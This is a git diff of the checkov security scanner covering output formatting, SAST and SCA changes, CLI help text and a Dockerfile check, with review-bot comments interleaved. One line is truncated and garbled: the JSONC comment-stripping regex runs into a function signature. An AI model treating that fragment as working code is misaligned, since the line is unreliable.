@@ -20,14 +20,12 @@ from checkov.common.typing import _ExitCodeThresholds, _ScaExitCodeThresholds from checkov.common.output.record import Record, SCA_PACKAGE_SCAN_CHECK_NAME from checkov.common.sast.consts import POLICIES_ERRORS, POLICIES_ERRORS_COUNT, SOURCE_FILES_COUNT, POLICY_COUNT -from checkov.common.util.consts import PARSE_ERROR_FAIL_FLAG, CHECKOV_RUN_SCA_PACKAGE_SCAN_V2, S3_UPLOAD_DETAILS_MESSAGE +from checkov.common.util.consts import PARSE_ERROR_FAIL_FLAG, S3_UPLOAD_DETAILS_MESSAGE from checkov.common.util.json_utils import CustomJSONEncoder from checkov.runner_filter import RunnerFilter from checkov.sca_package_2.output import create_cli_output as create_sca_package_cli_output_v2 -from checkov.sca_package.output import create_cli_output as create_sca_package_cli_output_v1 - from checkov.policies_3d.output import create_cli_output as create_3d_policy_cli_output from checkov.version import version @@ -311,7 +309,7 @@ def print_console( # output for vulnerabilities is different if self.check_type in (CheckType.SCA_PACKAGE, CheckType.SCA_IMAGE): if self.failed_checks or self.skipped_checks: - create_cli_output = create_sca_package_cli_output_v2 if CHECKOV_RUN_SCA_PACKAGE_SCAN_V2 else create_sca_package_cli_output_v1 + create_cli_output = create_sca_package_cli_output_v2 output_data += create_cli_output(self.check_type == CheckType.SCA_PACKAGE, self.failed_checks, self.skipped_checks) 
@@ -369,20 +367,30 @@ def print_failed_github_md(self, use_bc_ids: bool = False) -> str: result.append( [ record.get_output_id(use_bc_ids), - record.file_path, - record.resource, record.check_name, - record.guideline, + record.resource, + f"[Link]({record.guideline})", + record.file_path, ] ) if result: + summary = self.get_summary() + if self.parsing_errors: + message = "Passed Checks: {}, Failed Checks: {}, Skipped Checks: {}, Parsing Errors: {}\n\n".format( + summary["passed"], + summary["failed"], + summary["skipped"], + summary["parsing_errors"], + ) + else: + message = f"```\nPassed Checks: {summary['passed']}, Failed Checks: {summary['failed']}, Skipped Checks: {summary['skipped']}\n```\n\n" + table = tabulate( result, - headers=["check_id", "file", "resource", "check_name", "guideline"], + headers=["Check ID", "Check Name", "Resource", "Guideline", "File"], tablefmt="github", - showindex=True, ) - output_data = f"### {self.check_type} scan results:\n\n{table}\n\n---\n" + output_data = f"### {self.check_type.replace('_', ' ').title()} Scan Results:\n\n{message}{table}\n\n---\n" return output_data else: return "\n\n---\n\n" diff --git a/checkov/common/runners/object_runner.py b/checkov/common/runners/object_runner.py index a41397fa722..15eaba47e9c 100644 --- a/checkov/common/runners/object_runner.py +++ b/checkov/common/runners/object_runner.py @@ -123,13 +123,13 @@ def run( if self.graph_registry: self.graph_registry.load_external_checks(directory) + if root_folder: + self.root_folder = root_folder + if not self.context or not self.definitions: if files: self._load_files(files) - if root_folder: - self.root_folder = root_folder - for root, d_names, f_names in os.walk(root_folder): filter_ignored_paths(root, d_names, runner_filter.excluded_paths, self.included_paths()) filter_ignored_paths(root, f_names, runner_filter.excluded_paths, self.included_paths()) 
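Review bot: `f"[Link]({record.guideline})"` renders the literal text `[Link](None)` when a record has no guideline, where the previous code emitted the raw value; guard it, `f"[Link]({record.guideline})" if record.guideline else ""`. The summary text is wrapped in a ``` block only in the no-parsing-errors branch, so the two variants render differently in the PR comment; build one message and wrap it once. The table cells (`check_name`, `resource`) are inserted unescaped, so a `|` in either breaks the github table format — pre-existing, but worth noting now that the column order changed.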
diff --git a/checkov/common/runners/runner_registry.py b/checkov/common/runners/runner_registry.py index e0cf96b440c..69685c005ce 100644 --- a/checkov/common/runners/runner_registry.py +++ b/checkov/common/runners/runner_registry.py @@ -149,7 +149,6 @@ def run( # then raise a clear error # if some frameworks are disabled and the user used --framework, log a warning so they see it # if some frameworks are disabled and the user did not use --framework, then log at a lower level so that we have it for troubleshooting - frameworks_specified = self.runner_filter.framework and 'all' not in self.runner_filter.framework if not valid_runners: runners_categories = os.linesep.join([f'{runner.check_type}: {self.licensing_integration.get_subscription_for_runner(runner.check_type).name}' for runner in invalid_runners]) error_message = f'All the frameworks are disabled because they are not enabled in the platform. ' \ @@ -157,8 +156,10 @@ def run( logging.error(error_message) raise ModuleNotEnabledError(error_message) elif invalid_runners: - level = logging.WARNING if frameworks_specified else logging.INFO for runner in invalid_runners: + level = logging.INFO + if runner.check_type in self.runner_filter.framework_flag_values: + level = logging.WARNING logging.log(level, f'The framework "{runner.check_type}" is part of the "{self.licensing_integration.get_subscription_for_runner(runner.check_type).name}" module, which is not enabled in the platform') valid_runners = self._merge_runners(valid_runners) diff --git a/checkov/common/sast/consts.py b/checkov/common/sast/consts.py index c90a6cc9348..ee568dcbe7f 100644 --- a/checkov/common/sast/consts.py +++ b/checkov/common/sast/consts.py 
@@ -1,5 +1,12 @@ from enum import Enum from typing import List, Any, Set +from pathlib import Path + + +SAST_FRAMEWORK_PREFIX = 'sast' +CDK_FRAMEWORK_PREFIX = 'cdk' +# checkov/checkov/cdk/checks +CDK_CHECKS_DIR_PATH = Path(__file__).parent.parent.parent / CDK_FRAMEWORK_PREFIX / "checks" class SastLanguages(Enum): @@ -14,6 +21,8 @@ def set(cls) -> Set["SastLanguages"]: PYTHON = 'python' JAVA = 'java' JAVASCRIPT = 'javascript' + TYPESCRIPT = 'typescript' + GOLANG = 'golang' class CDKLanguages(Enum): @@ -26,6 +35,7 @@ def set(cls) -> Set["CDKLanguages"]: return set(cls) PYTHON = 'python' + TYPESCRIPT = 'typescript' class BqlVersion(str, Enum): @@ -47,12 +57,16 @@ def get_bql_version_from_string(version_str: str) -> str: SastLanguages.PYTHON: ['py'], SastLanguages.JAVA: ['java'], SastLanguages.JAVASCRIPT: ['js'], + SastLanguages.TYPESCRIPT: ['ts'], + SastLanguages.GOLANG: ['go'], } FILE_EXT_TO_SAST_LANG = { 'py': SastLanguages.PYTHON, 'java': SastLanguages.JAVA, 'js': SastLanguages.JAVASCRIPT, + 'ts': SastLanguages.TYPESCRIPT, + 'go': SastLanguages.GOLANG, } POLICIES_ERRORS = 'policies_errors' diff --git a/checkov/common/sast/report_types.py b/checkov/common/sast/report_types.py index 5252c92231d..150dac34a16 100644 --- a/checkov/common/sast/report_types.py +++ b/checkov/common/sast/report_types.py @@ -23,6 +23,7 @@ class MatchLocation(BaseModel): start: Point # noqa: CCE003 end: Point # noqa: CCE003 code_block: str # noqa: CCE003 + extended_code_block: Optional[Dict[str, Any]] = None # noqa: CCE003 @model_serializer def serialize_model(self) -> Dict[str, Any]: @@ -98,6 +99,11 @@ class Repositories(BaseModel): files: Dict[str, File] # noqa: CCE003 +class SkippedCheck(BaseModel): + check_id: str # noqa: CCE003 + suppress_comment: str # noqa: CCE003 + + class PrismaReport(BaseModel): rule_match: Dict[SastLanguages, Dict[str, RuleMatch]] # noqa: CCE003 errors: Dict[str, List[str]] # noqa: CCE003 
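Review bot: `FILE_EXT_TO_SAST_LANG` and the extension list map TypeScript only to `ts`, so `.tsx` sources (TypeScript with JSX) will not be classified as TypeScript; if those are meant to be scanned, add `'tsx'` alongside `'ts'` in both tables (the existing JavaScript entry likewise omits `jsx`/`mjs`/`cjs`, which may be deliberate). The comment `# checkov/checkov/cdk/checks` above `CDK_CHECKS_DIR_PATH` would be clearer as `# three levels up from this file: <repo>/checkov/cdk/checks`, so the intent of the `.parent.parent.parent` chain is explicit.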
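Review bot: `MatchLocation` gains `extended_code_block`, but the class has a custom `@model_serializer serialize_model` directly below the new field (its body is outside the hunk); a hand-written serializer does not pick up new fields automatically, so confirm it emits `extended_code_block`, otherwise the value is silently dropped from serialized reports. A one-line comment on the field, `# optional; must also be emitted by serialize_model below`, would make that coupling visible to the next person adding a field.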
@@ -105,13 +111,15 @@ class PrismaReport(BaseModel): run_metadata: Dict[str, Optional[Union[str, int, List[str]]]] # noqa: CCE003 imports: Dict[SastLanguages, Dict[str, Dict[str, Union[List[str], Dict[str, str]]]]] # noqa: CCE003 reachability_report: Dict[SastLanguages, Dict[str, Repositories]] # noqa: CCE003 + skipped_checks_by_file: Dict[str, List[SkippedCheck]] # noqa: CCE003 def create_empty_report(languages: List[SastLanguages]) -> PrismaReport: matches: Dict[SastLanguages, Dict[str, RuleMatch]] = {} for lang in languages: matches[lang] = {} - return PrismaReport(rule_match=matches, errors={}, profiler={}, run_metadata={}, imports={}, reachability_report={}) + return PrismaReport(rule_match=matches, errors={}, profiler={}, run_metadata={}, imports={}, reachability_report={}, + skipped_checks_by_file={}) def serialize_reachability_report(report: Dict[str, Repositories]) -> Dict[str, Any]: diff --git a/checkov/common/sca/output.py b/checkov/common/sca/output.py index 41bf0588cff..7c53364f51b 100644 --- a/checkov/common/sca/output.py +++ b/checkov/common/sca/output.py @@ -182,9 +182,15 @@ def create_report_cve_record( package_type = get_package_type(package_name, package_version, sca_details) cve_id = vulnerability_details.get("id", vulnerability_details.get("cveId", '')).upper() severity = vulnerability_details.get("severity", DEFAULT_SEVERITY) + # sanitize severity names if severity == "moderate": severity = "medium" + if severity.upper() not in Severities: + logging.warning(f"unknown severity - severity '{severity}' is unknown. using the DEFAULT_SEVERITY: '{DEFAULT_SEVERITY}' instead. " + f"vulnerabilities-details: {vulnerability_details}") + severity = DEFAULT_SEVERITY + description = vulnerability_details.get("description") check_result: _CheckResult = { diff --git a/checkov/common/sca/reachability/package_alias_mapping/nodejs/utils.py b/checkov/common/sca/reachability/package_alias_mapping/nodejs/utils.py index 5fb99c8a267..05dd9beb45f 100644 
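Review bot: `severity.upper()` in the new guard raises `AttributeError` when the vulnerability record carries `"severity": null`, because `.get("severity", DEFAULT_SEVERITY)` only substitutes the default for a missing key, not for `None`; use `severity = vulnerability_details.get("severity") or DEFAULT_SEVERITY` so the sanitizer covers that case too. The warning also logs the entire `vulnerability_details` dict, which is verbose for a per-finding message; `cve_id` and the raw severity value are enough to diagnose an unknown severity. Whether `severity.upper() not in Severities` is the right membership test depends on how `Severities` is keyed, which is not visible here — worth confirming. The enclosing `create_report_cve_record` starts and ends outside the hunk.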
--- a/checkov/common/sca/reachability/package_alias_mapping/nodejs/utils.py +++ b/checkov/common/sca/reachability/package_alias_mapping/nodejs/utils.py @@ -13,6 +13,14 @@ EXPORT_DEFAULT_PATTERN = r'export\s*default\s*({.*?});' +def load_json_with_comments(json_str: str) -> Any: + # Regular expression to remove comments (both single line and multi-line) + pattern = r'(? Dict[str, Any] | None: module_export_match = re.search(pattern, file_content, re.DOTALL) @@ -40,7 +48,7 @@ def parse_webpack_file(file_content: str, relevant_packages: Set[str]) -> Dict[s def parse_tsconfig_file(file_content: str, relevant_packages: Set[str]) -> Dict[str, Any]: output: Dict[str, Any] = {"packageAliases": {}} - tsconfig_json = json.loads(file_content) + tsconfig_json = load_json_with_comments(file_content) paths = tsconfig_json.get("compilerOptions", {}).get("paths", {}) for imported_name in paths: for package_relative_path in paths[imported_name]: @@ -52,7 +60,7 @@ def parse_tsconfig_file(file_content: str, relevant_packages: Set[str]) -> Dict[ def parse_babel_file(file_content: str, relevant_packages: Set[str]) -> Dict[str, Any]: output: Dict[str, Any] = {"packageAliases": {}} - babelrc_json = json.loads(file_content) + babelrc_json = load_json_with_comments(file_content) plugins = babelrc_json.get("plugins", {}) for plugin in plugins: if len(plugin) > 1: @@ -91,7 +99,7 @@ def parse_rollup_file(file_content: str, relevant_packages: Set[str]) -> Dict[st def parse_package_json_file(file_content: str, relevant_packages: Set[str]) -> Dict[str, Any]: output: Dict[str, Any] = {"packageAliases": {}} try: - package_json = json.loads(file_content) + package_json = load_json_with_comments(file_content) except JSONDecodeError: logging.warning('unable to parse package json file') return output diff --git a/checkov/common/util/consts.py b/checkov/common/util/consts.py index 55f58f096c0..0693da12c4f 100644 --- a/checkov/common/util/consts.py +++ b/checkov/common/util/consts.py 
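Review bot: `load_json_with_comments` strips comments with a regular expression before `json.loads`, and as rendered here the pattern is truncated (`pattern = r'(? Dict[str, Any] | None:`), so the actual expression cannot be reviewed; whatever it is, a naive `//` / `/* */` stripper will also eat the `//` inside string values such as URLs, which tsconfig `paths` and package.json fields commonly contain, yielding either a decode error or silently altered aliases. Make sure the pattern matches string literals first (e.g. `"(?:\\.|[^"\\])*"`) and keeps them intact, and add a short docstring stating that the input is tsconfig/babelrc/package.json text that may contain JSONC-style comments. Note also that `parse_tsconfig_file` and `parse_babel_file` (the next two hunks) call it without catching `JSONDecodeError`, while `parse_package_json_file` does, so a malformed config in a scanned repository still raises out of the tsconfig and babel parsers.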
@@ -5,6 +5,7 @@ START_LINE = '__startline__' END_LINE = '__endline__' LINE_FIELD_NAMES = {START_LINE, END_LINE} +TRUE_AFTER_UNKNOWN = 'true_after_unknown' DEV_API_GET_HEADERS = { 'Accept': 'application/json' @@ -26,8 +27,6 @@ MAX_IAC_FILE_SIZE = int(os.getenv('CHECKOV_MAX_IAC_FILE_SIZE', '50_000_000')) # 50 MB is default limit -CHECKOV_RUN_SCA_PACKAGE_SCAN_V2 = os.getenv('CHECKOV_RUN_SCA_PACKAGE_SCAN_V2', 'true').lower() == 'true' - RESOURCE_ATTRIBUTES_TO_OMIT_UNIVERSAL_MASK = '*' S3_UPLOAD_DETAILS_MESSAGE = 'An error occurred uploading results to the platform. A details URL is not available for this run. ' \ diff --git a/checkov/common/util/env_vars_config.py b/checkov/common/util/env_vars_config.py index a4e45be2048..8e6faa4981a 100644 --- a/checkov/common/util/env_vars_config.py +++ b/checkov/common/util/env_vars_config.py @@ -21,6 +21,7 @@ def __init__(self) -> None: self.CACHE_DIR = convert_str_to_bool(os.getenv("CKV_CACHE_DIR", str(Path(tempfile.gettempdir()) / "cache"))) self.CHECK_FAIL_LEVEL = os.getenv("CHECKOV_CHECK_FAIL_LEVEL", CheckFailLevel.ERROR) self.CREATE_COMPLEX_VERTICES = convert_str_to_bool(os.getenv("CREATE_COMPLEX_VERTICES", True)) + self.CHECKOV_ENABLE_DATAS_FOREACH_HANDLING = os.getenv('CHECKOV_ENABLE_DATAS_FOREACH_HANDLING', 'False') self.CREATE_EDGES = convert_str_to_bool(os.getenv("CREATE_EDGES", True)) self.CREATE_MARKDOWN_HYPERLINKS = convert_str_to_bool(os.getenv("CHECKOV_CREATE_MARKDOWN_HYPERLINKS", False)) self.CREATE_SCA_IMAGE_REPORTS_FOR_IR = convert_str_to_bool( 
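Review bot: `CHECKOV_ENABLE_DATAS_FOREACH_HANDLING` is stored as the raw string from `os.getenv(..., 'False')`, unlike every neighbouring flag which goes through `convert_str_to_bool`, so any truthiness test on it is always true (the default `'False'` is a non-empty string). Use `self.CHECKOV_ENABLE_DATAS_FOREACH_HANDLING = convert_str_to_bool(os.getenv("CHECKOV_ENABLE_DATAS_FOREACH_HANDLING", False))`. The same applies to `CKV_SUPPORT_ALL_RESOURCE_TYPE` in the later hunk of this file, which yields the string `'false'` when a user explicitly disables it. The enclosing `__init__` starts and ends outside the hunk.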
@@ -57,7 +58,6 @@ def __init__(self) -> None: self.RENDER_VARIABLES_ASYNC = convert_str_to_bool(os.getenv("RENDER_VARIABLES_ASYNC", False)) self.RUN_IN_DOCKER = convert_str_to_bool(os.getenv("RUN_IN_DOCKER", False)) self.REQUEST_MAX_TRIES = force_int(os.getenv("REQUEST_MAX_TRIES", 3)) - self.RUN_SCA_PACKAGE_SCAN_V2 = convert_str_to_bool(os.getenv("CHECKOV_RUN_SCA_PACKAGE_SCAN_V2", True)) self.RUN_SECRETS_MULTIPROCESS = convert_str_to_bool(os.getenv("RUN_SECRETS_MULTIPROCESS", False)) self.SLEEP_BETWEEN_REQUEST_TRIES = force_int(os.getenv("SLEEP_BETWEEN_REQUEST_TRIES", 1)) self.SLS_FILE_MASK = os.getenv("CKV_SLS_FILE_MASK", "serverless.yml,serverless.yaml").split(",") @@ -75,6 +75,7 @@ def __init__(self) -> None: # need to fix usage, because the env var value is set inside the code self.GITHUB_CONF_DIR_PATH = os.getenv("CKV_GITHUB_CONF_DIR_PATH") self.ENABLE_DEFINITION_KEY = os.getenv("ENABLE_DEFINITION_KEY", False) + self.CKV_SUPPORT_ALL_RESOURCE_TYPE = os.getenv('CKV_SUPPORT_ALL_RESOURCE_TYPE', False) env_vars_config = EnvVarsConfig() diff --git a/checkov/common/util/ext_argument_parser.py b/checkov/common/util/ext_argument_parser.py index f58b5efc714..7abe5f4ff62 100644 --- a/checkov/common/util/ext_argument_parser.py +++ b/checkov/common/util/ext_argument_parser.py 
@@ -163,14 +163,16 @@ def add_parser_args(self) -> None: self.add( "--external-checks-dir", action="append", - help="Directory for custom checks to be loaded. Can be repeated", + help="Directory for custom checks to be loaded. Can be repeated. Note that this will run Python code " + 'from the specified directory, so only use this option with trusted directories.', ) self.add( "--external-checks-git", action="append", - help="Github url of external checks to be added.\n you can specify a subdirectory after a double-slash //." - "\n possible to use ?ref=tags/tagName or ?ref=heads/branchName or ?ref=commit_id" - "\n cannot be used together with --external-checks-dir", + help="GitHub url of external checks to be added. You can specify a subdirectory after a double-slash //." + "It is ossible to use ?ref=tags/tagName or ?ref=heads/branchName or ?ref=commit_id and " + "cannot be used together with --external-checks-dir. Note that this will run Python code " + "from the specified directory, so only use this option with trusted repositories.", ) self.add( "-l", 
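Review bot: The new `--external-checks-git` help text concatenates `"... double-slash //."` directly with `"It is ossible ..."`, so it renders as `//.It is ossible` — a missing space and a typo. Change the second fragment to `" It is possible to use ?ref=tags/tagName or ?ref=heads/branchName or ?ref=commit_id and "` and keep a leading space on each continuation fragment. The added warning that both options execute Python from the given location is the right thing to surface to users. The enclosing `add_parser_args` starts and ends outside the hunk.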
@@ -464,8 +466,19 @@ def add_parser_args(self) -> None: self.add( "--policy-metadata-filter", help="comma separated key:value string to filter policies based on Prisma Cloud policy metadata. " + "When used with --policy-metadata-filter-exception, the exceptions override any policies selected as" + "a result of the --policy-metadata-filter flag." "See https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policy-filters-and-options for " - "information on allowed filters. Format: policy.label=test,cloud.type=aws ", + "information on allowed filters. Example: policy.label=label1,policy.label=label2,cloud.type=aws", + default=None, + ) + self.add( + "--policy-metadata-filter-exception", + help="comma separated key:value string to exclude filtered policies based on Prisma Cloud policy metadata. " + "When used with --policy-metadata-filter, the exceptions override any policies selected as" + "a result of the --policy-metadata-filter flag." + "See https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policy-filters-and-options for " + "information on allowed filters. Example: policy.label=label1,policy.label=label2,cloud.type=aws", default=None, ) self.add( diff --git a/checkov/common/util/str_utils.py b/checkov/common/util/str_utils.py index b340cb169e9..f47cd3059ec 100644 --- a/checkov/common/util/str_utils.py +++ b/checkov/common/util/str_utils.py @@ -11,6 +11,12 @@ def removeprefix(input_str: str, prefix: str) -> str: return input_str +# in case of comparing paths from the BE and from the client, we have to make sure the structures are the same +# e.g: in windows the seperator for the path is '\' while in linux/max it is '/' +def align_path(path: str) -> str: + return path.replace('\\', '/') + + def convert_to_seconds(input_str: str) -> int: if re.search(seconds_per_unit_regex, input_str) is None: raise Exception(f"format error for input str, usage: {seconds_per_unit_regex}") 
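Review bot: Both help strings in this hunk are missing spaces at their fragment boundaries: `"... selected as"` + `"a result ..."` renders as `selected asa result`, and `"... --policy-metadata-filter flag."` + `"See https://..."` renders as `flag.See`. Add a trailing space to `"...selected as "` and `"...flag. "` in both options. The exception option's summary "exclude filtered policies" reads as if it narrows the already-filtered set; "exclude policies matching these filters, overriding --policy-metadata-filter" would state the precedence more plainly.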
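Review bot: The comment above `align_path` has two typos (`seperator` → `separator`, `linux/max` → `linux/mac`) and would serve better as a docstring so it appears in help output: `"""Normalise path separators to '/' so backend and client paths compare equal across Windows and POSIX."""`. Worth noting in that docstring that `replace('\\', '/')` also rewrites a backslash that is a legitimate character of a POSIX file name, which is acceptable for comparison but not for reopening the path.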
diff --git a/checkov/common/util/type_forcers.py b/checkov/common/util/type_forcers.py index 371e53ba7cf..7db59879209 100644 --- a/checkov/common/util/type_forcers.py +++ b/checkov/common/util/type_forcers.py @@ -4,7 +4,7 @@ import logging import typing from json import JSONDecodeError -from typing import TypeVar, overload, Any, Dict +from typing import TypeVar, overload, Any, Tuple, List import yaml 
@@ -130,21 +130,26 @@ def convert_csv_string_arg_to_list(csv_string_arg: list[str] | str | None) -> li return csv_string_arg -def convert_prisma_policy_filter_to_dict(filter_string: str) -> Dict[Any, Any]: +def convert_prisma_policy_filter_to_params(filter_string: str) -> List[Tuple[str, str]]: """ - Converts the filter string to a dict. For example: + Converts the filter string to a list of tuples. For example: 'policy.label=label,cloud.type=aws' becomes --> - {'policy.label': 'label1', 'cloud.type': 'aws'} - Note that the API does not accept lists https://prisma.pan.dev/api/cloud/cspm/policy#operation/get-policies-v2 - This is not allowed: policy.label=label1,label2 + [('policy.label', 'label1'), ('cloud.type', 'aws')] + + Multiple values for the same attribute, like policy.label, will be separate items in the tuple. For example, + 'policy.label=label,policy.label=anotherlabel' becomes --> + [('policy.label', 'label1'), ('policy.label', 'anotherlabel')] + + Note that the urllib3 library seems to work best with tuples only (not lists), so this result may need to be converted. + It is returned as a list so that it can be modified separately, and converted to a tuple only when ready """ - filter_params = {} + filter_params: List[Tuple[str, str]] = [] if isinstance(filter_string, str) and filter_string: - filter_string = "".join(filter_string.split()) - try: - for f in filter_string.split(','): + for f in filter_string.split(','): + try: f_name, f_value = f.split('=') - filter_params[f_name] = f_value - except (IndexError, ValueError) as e: - logging.debug(f"Invalid filter format: {e}") + filter_params.append((f_name.strip(), f_value.strip())) + except (IndexError, ValueError) as e: + logging.debug(f"Invalid filter format: {e}") + return filter_params diff --git a/checkov/dockerfile/checks/RunUsingAPT.py b/checkov/dockerfile/checks/RunUsingAPT.py index f561a7d109e..5b07bacfcf5 100644 --- a/checkov/dockerfile/checks/RunUsingAPT.py 
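Review bot: `f_name, f_value = f.split('=')` raises `ValueError` for any filter value that itself contains `=`, and the filter is then dropped with only a debug log, so a valid filter is silently ignored; use `f_name, sep, f_value = f.partition('=')` and treat `not sep` or an empty stripped `f_name` as the invalid case. The docstring examples are inconsistent with their inputs: `'policy.label=label,cloud.type=aws'` is said to become `('policy.label', 'label1')`, and `'policy.label=label,policy.label=anotherlabel'` likewise becomes `'label1'` — align the labels. The urllib3 remark in the docstring is a claim about a caller's library, so it is better phrased as the caller's responsibility ("callers that pass this to urllib3 should convert it to a tuple") rather than as a property of this function.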
+++ b/checkov/dockerfile/checks/RunUsingAPT.py @@ -23,8 +23,12 @@ def __init__(self) -> None: def scan_resource_conf(self, conf: list[_Instruction]) -> tuple[CheckResult, list[_Instruction] | None]: for run in conf: content = run["content"] - if " apt " in content: - return CheckResult.FAILED, [run] + # Split the content by '&&' and strip any leading/trailing spaces from each segment + commands = [cmd.strip() for cmd in content.split("&&")] + for command in commands: + # Check if 'apt' is used and it's not part of a 'rm' command + if " apt " in command and "rm" not in command: + return CheckResult.FAILED, [run] return CheckResult.PASSED, None diff --git a/checkov/docs_generator.py b/checkov/docs_generator.py index 27042664467..dc04fea757d 100644 --- a/checkov/docs_generator.py +++ b/checkov/docs_generator.py @@ -58,11 +58,13 @@ def get_compare_key(c: list[str] | tuple[str, ...]) -> list[tuple[str, str, int, def print_checks(frameworks: Optional[List[str]] = None, use_bc_ids: bool = False, - include_all_checkov_policies: bool = True, filtered_policy_ids: Optional[List[str]] = None) -> None: + include_all_checkov_policies: bool = True, filtered_policy_ids: Optional[List[str]] = None, + filtered_exception_policy_ids: Optional[List[str]] = None) -> None: framework_list = frameworks if frameworks else ["all"] printable_checks_list = get_checks(framework_list, use_bc_ids=use_bc_ids, include_all_checkov_policies=include_all_checkov_policies, - filtered_policy_ids=filtered_policy_ids or []) + filtered_policy_ids=filtered_policy_ids or [], + filtered_exception_policy_ids=filtered_exception_policy_ids or []) print( tabulate(printable_checks_list, headers=["Id", "Type", "Entity", "Policy", "IaC", "Resource Link"], tablefmt="github", showindex=True)) 
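Review bot: The new loop strips each `&&` segment before testing `" apt " in command`, so a segment that begins with `apt` (the first command, or any later segment once its leading whitespace is stripped) no longer has the leading space the substring test relies on and is missed — the original matched these because the untouched `content` kept the surrounding spaces. The `"rm" not in command` exemption is a bare substring test as well, so any segment containing `rm` anywhere (`xterm`, `firmware`, `--permissions`) suppresses the finding. Match both as tokens: `if re.search(r"(?:^|\s)apt\s", command) and not re.search(r"(?:^|\s)rm\s", command):` (needs `import re`), or narrower still, only skip when `rm` is the segment's first token. Segments joined by `;` or `||` are still not split; a comment saying that is intentional would stop the next reader from "fixing" it.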
@@ -83,11 +85,15 @@ def get_check_link(absolute_path: str) -> str: def get_checks(frameworks: Optional[List[str]] = None, use_bc_ids: bool = False, - include_all_checkov_policies: bool = True, filtered_policy_ids: Optional[List[str]] = None) -> List[Tuple[str, str, int, int, str, str]]: + include_all_checkov_policies: bool = True, filtered_policy_ids: Optional[List[str]] = None, + filtered_exception_policy_ids: Optional[List[str]] = None) -> List[Tuple[str, str, int, int, str, str]]: framework_list = frameworks if frameworks else ["all"] printable_checks_list: list[tuple[str, str, str, str, str, str]] = [] filtered_policy_ids = filtered_policy_ids or [] - runner_filter = RunnerFilter(include_all_checkov_policies=include_all_checkov_policies, filtered_policy_ids=filtered_policy_ids) + filtered_exception_policy_ids = filtered_exception_policy_ids or [] + runner_filter = RunnerFilter(include_all_checkov_policies=include_all_checkov_policies, + filtered_policy_ids=filtered_policy_ids, + filtered_exception_policy_ids=filtered_exception_policy_ids) def add_from_repository(registry: Union[BaseCheckRegistry, BaseGraphRegistry], checked_type: str, iac: str, runner_filter: RunnerFilter = runner_filter) -> None: diff --git a/checkov/github_actions/image_referencer/manager.py b/checkov/github_actions/image_referencer/manager.py deleted file mode 100644 index 822287da929..00000000000 --- a/checkov/github_actions/image_referencer/manager.py +++ /dev/null 
@@ -1,15 +0,0 @@ -from __future__ import annotations -from typing import Any - -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager -from checkov.github_actions.image_referencer.provider import GithubActionProvider - - -class GithubActionsImageReferencerManager(WorkflowImageReferencerManager): - __slots__ = ("workflow_config", "file_path", "workflow_line_numbers", "provider") - - def __init__(self, workflow_config: dict[str, Any], file_path: str, workflow_line_numbers: list[tuple[int, str]]): - provider = GithubActionProvider(workflow_config=workflow_config, file_path=file_path, - workflow_line_numbers=workflow_line_numbers) - super().__init__(workflow_config, file_path, provider) - self.workflow_line_numbers = workflow_line_numbers diff --git a/checkov/github_actions/image_referencer/provider.py b/checkov/github_actions/image_referencer/provider.py deleted file mode 100644 index e2b4a8e04f8..00000000000 --- a/checkov/github_actions/image_referencer/provider.py +++ /dev/null 
@@ -1,66 +0,0 @@ -from __future__ import annotations -from typing import Any - -from checkov.common.images.image_referencer import Image -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider -from checkov.common.util.consts import START_LINE, END_LINE - - -class GithubActionProvider(WorkflowImageReferencerProvider): - - def __init__(self, workflow_config: dict[str, Any], file_path: str, workflow_line_numbers: list[tuple[int, str]]): - super().__init__(workflow_config, file_path) - self.workflow_line_numbers = workflow_line_numbers - - def generate_resource_key(self, start_line: int, end_line: int) -> str: - """ - Generate resource key without the previous format of key (needed in get_resource) - """ - jobs_dict: dict[str, Any] = self.workflow_config.get("jobs", {}) - for job_name, job in jobs_dict.items(): - if not isinstance(job, dict): - continue - - if job[START_LINE] <= start_line <= end_line <= job[END_LINE]: - return f'jobs({job_name})' - - return '' - - def extract_images_from_workflow(self) -> list[Image]: - images: list[Image] = [] - - if not isinstance(self.workflow_config, dict): - # make type checking happy - return images - - jobs = self.workflow_config.get("jobs", {}) - for job_object in jobs.values(): - if isinstance(job_object, dict): - container = job_object.get("container", {}) - image = None - start_line = 0 - end_line = 0 - - if isinstance(container, dict): - image = container.get("image", "") - start_line, end_line = container.get(START_LINE, 0), container.get(END_LINE, 0) - elif isinstance(container, str): - image = container - line_to_line_numbers = self.workflow_line_numbers[job_object[START_LINE] - 1:] - image_line = next((line_number for line_number, line in line_to_line_numbers if image in line), None) - if not image_line: - continue - start_line = image_line - end_line = start_line + 1 - - if image: - image_obj = Image( - file_path=self.file_path[self.file_path.index('/.github'):], - 
name=image, - start_line=start_line, - end_line=end_line, - related_resource_id=self.generate_resource_key(start_line, end_line) - ) - images.append(image_obj) - - return images diff --git a/checkov/github_actions/runner.py b/checkov/github_actions/runner.py index c0d13304225..98e1fb8fbeb 100644 --- a/checkov/github_actions/runner.py +++ b/checkov/github_actions/runner.py @@ -1,25 +1,19 @@ from __future__ import annotations import logging -import os from collections.abc import Iterable from typing import TYPE_CHECKING, Any import yaml +import checkov.common.parsers.yaml.loader as loader +from checkov.common.bridgecrew.check_type import CheckType from checkov.common.graph.graph_builder.consts import GraphSource from checkov.common.output.report import Report -from checkov.github_actions.image_referencer.manager import GithubActionsImageReferencerManager +from checkov.github_actions.checks.registry import registry from checkov.github_actions.graph_builder.local_graph import GitHubActionsLocalGraph from checkov.github_actions.utils import is_schema_valid, is_workflow_file - from checkov.runner_filter import RunnerFilter - -import checkov.common.parsers.yaml.loader as loader -from checkov.common.images.image_referencer import Image, ImageReferencerMixin -from checkov.common.bridgecrew.check_type import CheckType -from checkov.common.util.type_forcers import force_dict -from checkov.github_actions.checks.registry import registry from checkov.yaml_doc.runner import Runner as YamlRunner if TYPE_CHECKING: @@ -27,10 +21,9 @@ from checkov.common.typing import LibraryGraphConnector from checkov.common.runners.graph_builder.local_graph import ObjectLocalGraph from checkov.common.runners.graph_manager import ObjectGraphManager - from networkx import DiGraph -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.GITHUB_ACTIONS # noqa: CCE003 # a static attribute def __init__( 
